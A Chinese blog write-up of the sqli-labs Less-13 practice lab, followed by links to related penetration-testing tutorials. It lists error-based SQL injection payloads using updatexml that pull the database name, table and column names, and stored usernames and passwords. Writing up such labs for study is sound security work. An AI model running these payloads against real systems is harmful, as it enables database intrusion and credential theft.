[网络安全]sqli-labs Less-13 解题详析

简介: [网络安全]sqli-labs Less-13 解题详析

原理及姿势参考:[网络安全]SQL注入原理及常见攻击方法简析

Less-13与Less-12类似,具体原理不再赘述。

攻击姿势可参考本专栏Less-5:[网络安全]sqli-labs Less-5 解题详析

判断注入类型

输入1',回显如下:

可知注入类型为单引号+括号注入

判断注入点个数

由上下两张图回显可知,注入点个数为2

查库名

1') union select 1,updatexml(1,concat(0x7e,(select database()),0x7e),1)#

查表名

1') union select 1,updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,31),0x7e),1)#

查users表的列名

1') and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),1,31),0x7e),1)#

查字段

1') and updatexml(1,concat(0x7e,substr((select group_concat(username,password) from users),1,31),0x7e),1)#


总结

以上为[网络安全]sqli-labs Less-13 解题详析,后续将分享[网络安全]sqli-labs Less-14 解题详析

我是秋说,我们下次见。

目录
相关文章
|
22天前
|
网络协议 Unix Linux
【网络安全 | 信息收集】操作系统判定及端口扫描(全网最详析)
【网络安全 | 信息收集】操作系统判定及端口扫描(全网最详析)
35 0
|
22天前
|
安全 网络协议 网络安全
【网络安全 | 渗透工具/信息收集/域名爆破】SubDomainsBrute安装及使用详析
【网络安全 | 渗透工具/信息收集/域名爆破】SubDomainsBrute安装及使用详析
21 0
|
22天前
|
网络安全
【网络安全 | 渗透工具/信息收集/域名爆破】Layer子域名挖掘机安装及使用详析
【网络安全 | 渗透工具/信息收集/域名爆破】Layer子域名挖掘机安装及使用详析
60 0
|
22天前
|
Oracle 关系型数据库 MySQL
【网络安全 | 渗透工具】Hydra工具安装、使用详析
【网络安全 | 渗透工具】Hydra工具安装、使用详析
25 0
|
22天前
|
网络安全 数据安全/隐私保护
【网络安全 | 靶场搭建】基于Kali的FTP搭建流程及FileZilla连接、报错详析
【网络安全 | 靶场搭建】基于Kali的FTP搭建流程及FileZilla连接、报错详析
18 0
|
22天前
|
安全 Java 网络安全
【网络安全 | 扫描器】御剑安装及使用教程详析
【网络安全 | 扫描器】御剑安装及使用教程详析
23 0
|
22天前
|
Web App开发 算法 网络安全
【网络安全 | Misc】解码工具Koczkatamas及CyberChef安装及使用详析
【网络安全 | Misc】解码工具Koczkatamas及CyberChef安装及使用详析
27 0
|
22天前
|
存储 安全 生物认证
【网络安全 | 指纹识别工具】WhatWeb使用详析
【网络安全 | 指纹识别工具】WhatWeb使用详析
10 0
【网络安全 | 指纹识别工具】WhatWeb使用详析
|
22天前
|
网络安全 虚拟化
【网络安全 | 工具】Kali虚拟机安装教程及报错详析
【网络安全 | 工具】Kali虚拟机安装教程及报错详析
31 0
【网络安全 | 工具】Kali虚拟机安装教程及报错详析
|
22天前
|
前端开发 安全 JavaScript
【网络安全 | 网安工具】御剑WEB指纹识别系统使用详析
【网络安全 | 网安工具】御剑WEB指纹识别系统使用详析
15 0

热门文章

最新文章